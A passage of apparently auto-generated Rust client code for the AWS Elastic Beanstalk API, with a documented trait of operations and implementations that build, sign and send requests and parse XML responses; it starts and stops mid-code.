CheckDNSAvailabilityError>; #[doc="<p>Create or update a group of environments that each run a separate component of a single application. Takes a list of version labels that specify application source bundles for each of the environments to create or update. The name of each environment and other required information must be included in the source bundles in an environment manifest named <code>env.yaml</code>. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-mgmt-compose.html\">Compose Environments</a> for details.</p>"] fn compose_environments(&self, input: &ComposeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, ComposeEnvironmentsError>; #[doc="<p> Creates an application that has one configuration template named <code>default</code> and no application versions. </p>"] fn create_application(&self, input: &CreateApplicationMessage) -> Result<ApplicationDescriptionMessage, CreateApplicationError>; #[doc="<p>Creates an application version for the specified application. You can create an application version from a source bundle in Amazon S3, a commit in AWS CodeCommit, or the output of an AWS CodeBuild build as follows:</p> <p>Specify a commit in an AWS CodeCommit repository with <code>SourceBuildInformation</code>.</p> <p>Specify a build in an AWS CodeBuild with <code>SourceBuildInformation</code> and <code>BuildConfiguration</code>.</p> <p>Specify a source bundle in S3 with <code>SourceBundle</code> </p> <p>Omit both <code>SourceBuildInformation</code> and <code>SourceBundle</code> to use the default sample application.</p> <note> <p>Once you create an application version with a specified Amazon S3 bucket and key location, you cannot change that Amazon S3 location. If you change the Amazon S3 location, you receive an exception when you attempt to launch an environment from the application version.</p> </note>"] fn create_application_version(&self, input: &CreateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, CreateApplicationVersionError>; #[doc="<p>Creates a configuration template. Templates are associated with a specific application and are used to deploy different versions of the application with the same configuration settings.</p> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> <li> <p> <a>DescribeConfigurationSettings</a> </p> </li> <li> <p> <a>ListAvailableSolutionStacks</a> </p> </li> </ul>"] fn create_configuration_template(&self, input: &CreateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, CreateConfigurationTemplateError>; #[doc="<p>Launches an environment for the specified application using the specified configuration.</p>"] fn create_environment(&self, input: &CreateEnvironmentMessage) -> Result<EnvironmentDescription, CreateEnvironmentError>; #[doc="<p>Creates the Amazon S3 storage location for the account.</p> <p>This location is used to store user log files.</p>"] fn create_storage_location(&self) -> Result<CreateStorageLocationResultMessage, CreateStorageLocationError>; #[doc="<p>Deletes the specified application along with all associated versions and configurations. The application versions will not be deleted from your Amazon S3 bucket.</p> <note> <p>You cannot delete an application that has a running environment.</p> </note>"] fn delete_application(&self, input: &DeleteApplicationMessage) -> Result<(), DeleteApplicationError>; #[doc="<p>Deletes the specified version from the specified application.</p> <note> <p>You cannot delete an application version that is associated with a running environment.</p> </note>"] fn delete_application_version(&self, input: &DeleteApplicationVersionMessage) -> Result<(), DeleteApplicationVersionError>; #[doc="<p>Deletes the specified configuration template.</p> <note> <p>When you launch an environment using a configuration template, the environment gets a copy of the template. You can delete or modify the environment's copy of the template without affecting the running environment.</p> </note>"] fn delete_configuration_template(&self, input: &DeleteConfigurationTemplateMessage) -> Result<(), DeleteConfigurationTemplateError>; #[doc="<p>Deletes the draft configuration associated with the running environment.</p> <p>Updating a running environment with any configuration changes creates a draft configuration set. You can get the draft configuration using <a>DescribeConfigurationSettings</a> while the update is in progress or if the update fails. The <code>DeploymentStatus</code> for the draft configuration indicates whether the deployment is in process or has failed. The draft configuration remains in existence until it is deleted with this action.</p>"] fn delete_environment_configuration(&self, input: &DeleteEnvironmentConfigurationMessage) -> Result<(), DeleteEnvironmentConfigurationError>; #[doc="<p>Retrieve a list of application versions.</p>"] fn describe_application_versions(&self, input: &DescribeApplicationVersionsMessage) -> Result<ApplicationVersionDescriptionsMessage, DescribeApplicationVersionsError>; #[doc="<p>Returns the descriptions of existing applications.</p>"] fn describe_applications(&self, input: &DescribeApplicationsMessage) -> Result<ApplicationDescriptionsMessage, DescribeApplicationsError>; #[doc="<p>Describes the configuration options that are used in a particular configuration template or environment, or that a specified solution stack defines. The description includes the values the options, their default values, and an indication of the required action on a running environment if an option value is changed.</p>"] fn describe_configuration_options(&self, input: &DescribeConfigurationOptionsMessage) -> Result<ConfigurationOptionsDescription, DescribeConfigurationOptionsError>; #[doc="<p>Returns a description of the settings for the specified configuration set, that is, either a configuration template or the configuration set associated with a running environment.</p> <p>When describing the settings for the configuration set associated with a running environment, it is possible to receive two sets of setting descriptions. One is the deployed configuration set, and the other is a draft configuration of an environment that is either in the process of deployment or that failed to deploy.</p> <p>Related Topics</p> <ul> <li> <p> <a>DeleteEnvironmentConfiguration</a> </p> </li> </ul>"] fn describe_configuration_settings(&self, input: &DescribeConfigurationSettingsMessage) -> Result<ConfigurationSettingsDescriptions, DescribeConfigurationSettingsError>; #[doc="<p>Returns information about the overall health of the specified environment. The <b>DescribeEnvironmentHealth</b> operation is only available with AWS Elastic Beanstalk Enhanced Health.</p>"] fn describe_environment_health(&self, input: &DescribeEnvironmentHealthRequest) -> Result<DescribeEnvironmentHealthResult, DescribeEnvironmentHealthError>; #[doc="<p>Lists an environment's completed and failed managed actions.</p>"] fn describe_environment_managed_action_history(&self, input: &DescribeEnvironmentManagedActionHistoryRequest) -> Result<DescribeEnvironmentManagedActionHistoryResult, DescribeEnvironmentManagedActionHistoryError>; #[doc="<p>Lists an environment's upcoming and in-progress managed actions.</p>"] fn describe_environment_managed_actions(&self, input: &DescribeEnvironmentManagedActionsRequest) -> Result<DescribeEnvironmentManagedActionsResult, DescribeEnvironmentManagedActionsError>; #[doc="<p>Returns AWS resources for this environment.</p>"] fn describe_environment_resources(&self, input: &DescribeEnvironmentResourcesMessage) -> Result<EnvironmentResourceDescriptionsMessage, DescribeEnvironmentResourcesError>; #[doc="<p>Returns descriptions for existing environments.</p>"] fn describe_environments(&self, input: &DescribeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, DescribeEnvironmentsError>; #[doc="<p>Returns list of event descriptions matching criteria up to the last 6 weeks.</p> <note> <p>This action returns the most recent 1,000 events from the specified <code>NextToken</code>.</p> </note>"] fn describe_events(&self, input: &DescribeEventsMessage) -> Result<EventDescriptionsMessage, DescribeEventsError>; #[doc="<p>Retrives detailed information about the health of instances in your AWS Elastic Beanstalk. This operation requires <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced.html\">enhanced health reporting</a>.</p>"] fn describe_instances_health(&self, input: &DescribeInstancesHealthRequest) -> Result<DescribeInstancesHealthResult, DescribeInstancesHealthError>; #[doc="<p>Returns a list of the available solution stack names.</p>"] fn list_available_solution_stacks(&self) -> Result<ListAvailableSolutionStacksResultMessage, ListAvailableSolutionStacksError>; #[doc="<p>Deletes and recreates all of the AWS resources (for example: the Auto Scaling group, load balancer, etc.) for a specified environment and forces a restart.</p>"] fn rebuild_environment(&self, input: &RebuildEnvironmentMessage) -> Result<(), RebuildEnvironmentError>; #[doc="<p>Initiates a request to compile the specified type of information of the deployed environment.</p> <p> Setting the <code>InfoType</code> to <code>tail</code> compiles the last lines from the application server log files of every Amazon EC2 instance in your environment. </p> <p> Setting the <code>InfoType</code> to <code>bundle</code> compresses the application server log files for every Amazon EC2 instance into a <code>.zip</code> file. Legacy and .NET containers do not support bundle logs. </p> <p> Use <a>RetrieveEnvironmentInfo</a> to obtain the set of logs. </p> <p>Related Topics</p> <ul> <li> <p> <a>RetrieveEnvironmentInfo</a> </p> </li> </ul>"] fn request_environment_info(&self, input: &RequestEnvironmentInfoMessage) -> Result<(), RequestEnvironmentInfoError>; #[doc="<p>Causes the environment to restart the application container server running on each Amazon EC2 instance.</p>"] fn restart_app_server(&self, input: &RestartAppServerMessage) -> Result<(), RestartAppServerError>; #[doc="<p>Retrieves the compiled information from a <a>RequestEnvironmentInfo</a> request.</p> <p>Related Topics</p> <ul> <li> <p> <a>RequestEnvironmentInfo</a> </p> </li> </ul>"] fn retrieve_environment_info(&self, input: &RetrieveEnvironmentInfoMessage) -> Result<RetrieveEnvironmentInfoResultMessage, RetrieveEnvironmentInfoError>; #[doc="<p>Swaps the CNAMEs of two environments.</p>"] fn swap_environment_cnam_es(&self, input: &SwapEnvironmentCNAMEsMessage) -> Result<(), SwapEnvironmentCNAMEsError>; #[doc="<p>Terminates the specified environment.</p>"] fn terminate_environment(&self, input: &TerminateEnvironmentMessage) -> Result<EnvironmentDescription, TerminateEnvironmentError>; #[doc="<p>Updates the specified application to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. To clear these properties, specify an empty string.</p> </note>"] fn update_application(&self, input: &UpdateApplicationMessage) -> Result<ApplicationDescriptionMessage, UpdateApplicationError>; #[doc="<p>Modifies lifecycle settings for an application.</p>"] fn update_application_resource_lifecycle(&self, input: &UpdateApplicationResourceLifecycleMessage) -> Result<ApplicationResourceLifecycleDescriptionMessage, UpdateApplicationResourceLifecycleError>; #[doc="<p>Updates the specified application version to have the specified properties.</p> <note> <p>If a property (for example, <code>description</code>) is not provided, the value remains unchanged. To clear properties, specify an empty string.</p> </note>"] fn update_application_version(&self, input: &UpdateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, UpdateApplicationVersionError>; #[doc="<p>Updates the specified configuration template to have the specified properties or configuration option values.</p> <note> <p>If a property (for example, <code>ApplicationName</code>) is not provided, its value remains unchanged. To clear such properties, specify an empty string.</p> </note> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> </ul>"] fn update_configuration_template(&self, input: &UpdateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, UpdateConfigurationTemplateError>; #[doc="<p>Updates the environment description, deploys a new application version, updates the configuration settings to an entirely new configuration template, or updates select configuration option values in the running environment.</p> <p> Attempting to update both the release and configuration is not allowed and AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. </p> <p> When updating the configuration settings to a new template or individual settings, a draft configuration is created and <a>DescribeConfigurationSettings</a> for this environment returns two setting descriptions with different <code>DeploymentStatus</code> values. </p>"] fn update_environment(&self, input: &UpdateEnvironmentMessage) -> Result<EnvironmentDescription, UpdateEnvironmentError>; #[doc="<p>Takes a set of configuration settings and either a configuration template or environment, and determines whether those values are valid.</p> <p>This action returns a list of messages indicating any errors or warnings associated with the selection of option values.</p>"] fn validate_configuration_settings(&self, input: &ValidateConfigurationSettingsMessage) -> Result<ConfigurationSettingsValidationMessages, ValidateConfigurationSettingsError>; } /// A client for the Elastic Beanstalk API. pub struct ElasticBeanstalkClient<P, D> where P: ProvideAwsCredentials, D: DispatchSignedRequest { credentials_provider: P, region: region::Region, dispatcher: D, } impl<P, D> ElasticBeanstalkClient<P, D> where P: ProvideAwsCredentials, D: DispatchSignedRequest { pub fn new(request_dispatcher: D, credentials_provider: P, region: region::Region) -> Self { ElasticBeanstalkClient { credentials_provider: credentials_provider, region: region, dispatcher: request_dispatcher } } } impl<P, D> ElasticBeanstalk for ElasticBeanstalkClient<P, D> where P: ProvideAwsCredentials, D: DispatchSignedRequest { #[doc="<p>Cancels in-progress environment configuration update or application version deployment.</p>"] fn abort_environment_update(&self, input: &AbortEnvironmentUpdateMessage) -> Result<(), AbortEnvironmentUpdateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "AbortEnvironmentUpdate"); params.put("Version", "2010-12-01"); AbortEnvironmentUpdateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(AbortEnvironmentUpdateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Applies a scheduled managed action immediately. A managed action can be applied only if its status is <code>Scheduled</code>. Get the status and action ID of a managed action with <a>DescribeEnvironmentManagedActions</a>.</p>"] fn apply_environment_managed_action(&self, input: &ApplyEnvironmentManagedActionRequest) -> Result<ApplyEnvironmentManagedActionResult, ApplyEnvironmentManagedActionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ApplyEnvironmentManagedAction"); params.put("Version", "2010-12-01"); ApplyEnvironmentManagedActionRequestSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplyEnvironmentManagedActionResult::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplyEnvironmentManagedActionResultDeserializer::deserialize("ApplyEnvironmentManagedActionResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ApplyEnvironmentManagedActionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Checks if the specified CNAME is available.</p>"] fn check_dns_availability(&self, input: &CheckDNSAvailabilityMessage) -> Result<CheckDNSAvailabilityResultMessage, CheckDNSAvailabilityError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CheckDNSAvailability"); params.put("Version", "2010-12-01"); CheckDNSAvailabilityMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = CheckDNSAvailabilityResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(CheckDNSAvailabilityResultMessageDeserializer::deserialize("CheckDNSAvailabilityResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CheckDNSAvailabilityError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Create or update a group of environments that each run a separate component of a single application. Takes a list of version labels that specify application source bundles for each of the environments to create or update. The name of each environment and other required information must be included in the source bundles in an environment manifest named <code>env.yaml</code>. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-mgmt-compose.html\">Compose Environments</a> for details.</p>"] fn compose_environments(&self, input: &ComposeEnvironmentsMessage) -> Result<EnvironmentDescriptionsMessage, ComposeEnvironmentsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "ComposeEnvironments"); params.put("Version", "2010-12-01"); ComposeEnvironmentsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionsMessageDeserializer::deserialize("ComposeEnvironmentsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(ComposeEnvironmentsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p> Creates an application that has one configuration template named <code>default</code> and no application versions. </p>"] fn create_application(&self, input: &CreateApplicationMessage) -> Result<ApplicationDescriptionMessage, CreateApplicationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateApplication"); params.put("Version", "2010-12-01"); CreateApplicationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationDescriptionMessageDeserializer::deserialize("CreateApplicationResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateApplicationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Creates an application version for the specified application. You can create an application version from a source bundle in Amazon S3, a commit in AWS CodeCommit, or the output of an AWS CodeBuild build as follows:</p> <p>Specify a commit in an AWS CodeCommit repository with <code>SourceBuildInformation</code>.</p> <p>Specify a build in an AWS CodeBuild with <code>SourceBuildInformation</code> and <code>BuildConfiguration</code>.</p> <p>Specify a source bundle in S3 with <code>SourceBundle</code> </p> <p>Omit both <code>SourceBuildInformation</code> and <code>SourceBundle</code> to use the default sample application.</p> <note> <p>Once you create an application version with a specified Amazon S3 bucket and key location, you cannot change that Amazon S3 location. If you change the Amazon S3 location, you receive an exception when you attempt to launch an environment from the application version.</p> </note>"] fn create_application_version(&self, input: &CreateApplicationVersionMessage) -> Result<ApplicationVersionDescriptionMessage, CreateApplicationVersionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateApplicationVersion"); params.put("Version", "2010-12-01"); CreateApplicationVersionMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationVersionDescriptionMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationVersionDescriptionMessageDeserializer::deserialize("CreateApplicationVersionResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateApplicationVersionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Creates a configuration template. Templates are associated with a specific application and are used to deploy different versions of the application with the same configuration settings.</p> <p>Related Topics</p> <ul> <li> <p> <a>DescribeConfigurationOptions</a> </p> </li> <li> <p> <a>DescribeConfigurationSettings</a> </p> </li> <li> <p> <a>ListAvailableSolutionStacks</a> </p> </li> </ul>"] fn create_configuration_template(&self, input: &CreateConfigurationTemplateMessage) -> Result<ConfigurationSettingsDescription, CreateConfigurationTemplateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateConfigurationTemplate"); params.put("Version", "2010-12-01"); CreateConfigurationTemplateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationSettingsDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationSettingsDescriptionDeserializer::deserialize("CreateConfigurationTemplateResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateConfigurationTemplateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Launches an environment for the specified application using the specified configuration.</p>"] fn create_environment(&self, input: &CreateEnvironmentMessage) -> Result<EnvironmentDescription, CreateEnvironmentError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateEnvironment"); params.put("Version", "2010-12-01"); CreateEnvironmentMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = EnvironmentDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(EnvironmentDescriptionDeserializer::deserialize("CreateEnvironmentResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateEnvironmentError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Creates the Amazon S3 storage location for the account.</p> <p>This location is used to store user log files.</p>"] fn create_storage_location(&self) -> Result<CreateStorageLocationResultMessage, CreateStorageLocationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "CreateStorageLocation"); params.put("Version", "2010-12-01"); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = CreateStorageLocationResultMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(CreateStorageLocationResultMessageDeserializer::deserialize("CreateStorageLocationResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(CreateStorageLocationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the specified application along with all associated versions and configurations. The application versions will not be deleted from your Amazon S3 bucket.</p> <note> <p>You cannot delete an application that has a running environment.</p> </note>"] fn delete_application(&self, input: &DeleteApplicationMessage) -> Result<(), DeleteApplicationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteApplication"); params.put("Version", "2010-12-01"); DeleteApplicationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteApplicationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the specified version from the specified application.</p> <note> <p>You cannot delete an application version that is associated with a running environment.</p> </note>"] fn delete_application_version(&self, input: &DeleteApplicationVersionMessage) -> Result<(), DeleteApplicationVersionError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteApplicationVersion"); params.put("Version", "2010-12-01"); DeleteApplicationVersionMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteApplicationVersionError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the specified configuration template.</p> <note> <p>When you launch an environment using a configuration template, the environment gets a copy of the template. You can delete or modify the environment's copy of the template without affecting the running environment.</p> </note>"] fn delete_configuration_template(&self, input: &DeleteConfigurationTemplateMessage) -> Result<(), DeleteConfigurationTemplateError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteConfigurationTemplate"); params.put("Version", "2010-12-01"); DeleteConfigurationTemplateMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteConfigurationTemplateError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Deletes the draft configuration associated with the running environment.</p> <p>Updating a running environment with any configuration changes creates a draft configuration set. You can get the draft configuration using <a>DescribeConfigurationSettings</a> while the update is in progress or if the update fails. The <code>DeploymentStatus</code> for the draft configuration indicates whether the deployment is in process or has failed. The draft configuration remains in existence until it is deleted with this action.</p>"] fn delete_environment_configuration(&self, input: &DeleteEnvironmentConfigurationMessage) -> Result<(), DeleteEnvironmentConfigurationError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DeleteEnvironmentConfiguration"); params.put("Version", "2010-12-01"); DeleteEnvironmentConfigurationMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result = (); Ok(result) } _ => { Err(DeleteEnvironmentConfigurationError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Retrieve a list of application versions.</p>"] fn describe_application_versions(&self, input: &DescribeApplicationVersionsMessage) -> Result<ApplicationVersionDescriptionsMessage, DescribeApplicationVersionsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeApplicationVersions"); params.put("Version", "2010-12-01"); DescribeApplicationVersionsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationVersionDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationVersionDescriptionsMessageDeserializer::deserialize("DescribeApplicationVersionsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeApplicationVersionsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns the descriptions of existing applications.</p>"] fn describe_applications(&self, input: &DescribeApplicationsMessage) -> Result<ApplicationDescriptionsMessage, DescribeApplicationsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeApplications"); params.put("Version", "2010-12-01"); DescribeApplicationsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ApplicationDescriptionsMessage::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ApplicationDescriptionsMessageDeserializer::deserialize("DescribeApplicationsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeApplicationsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Describes the configuration options that are used in a particular configuration template or environment, or that a specified solution stack defines. The description includes the values the options, their default values, and an indication of the required action on a running environment if an option value is changed.</p>"] fn describe_configuration_options(&self, input: &DescribeConfigurationOptionsMessage) -> Result<ConfigurationOptionsDescription, DescribeConfigurationOptionsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", "DescribeConfigurationOptions"); params.put("Version", "2010-12-01"); DescribeConfigurationOptionsMessageSerializer::serialize(&mut params, "", &input); request.set_params(params); request.sign(&try!(self.credentials_provider.credentials())); let response = try!(self.dispatcher.dispatch(&request)); match response.status { StatusCode::Ok => { let result; if response.body.is_empty() { result = ConfigurationOptionsDescription::default(); } else { let reader = EventReader::new_with_config( response.body.as_slice(), ParserConfig::new().trim_whitespace(true) ); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let actual_tag_name = try!(peek_at_name(&mut stack)); try!(start_element(&actual_tag_name, &mut stack)); result = try!(ConfigurationOptionsDescriptionDeserializer::deserialize("DescribeConfigurationOptionsResult", &mut stack)); skip_tree(&mut stack); try!(end_element(&actual_tag_name, &mut stack)); } Ok(result) } _ => { Err(DescribeConfigurationOptionsError::from_body(String::from_utf8_lossy(&response.body).as_ref())) } } } #[doc="<p>Returns a description of the settings for the specified configuration set, that is, either a configuration template or the configuration set associated with a running environment.</p> <p>When describing the settings for the configuration set associated with a running environment, it is possible to receive two sets of setting descriptions. One is the deployed configuration set, and the other is a draft configuration of an environment that is either in the process of deployment or that failed to deploy.</p> <p>Related Topics</p> <ul> <li> <p> <a>DeleteEnvironmentConfiguration</a> </p> </li> </ul>"] fn describe_configuration_settings(&self, input: &DescribeConfigurationSettingsMessage) -> Result<ConfigurationSettingsDescriptions, DescribeConfigurationSettingsError> { let mut request = SignedRequest::new("POST", "elasticbeanstalk", self.region, "/"); let mut params = Params::new(); params.put("Action", 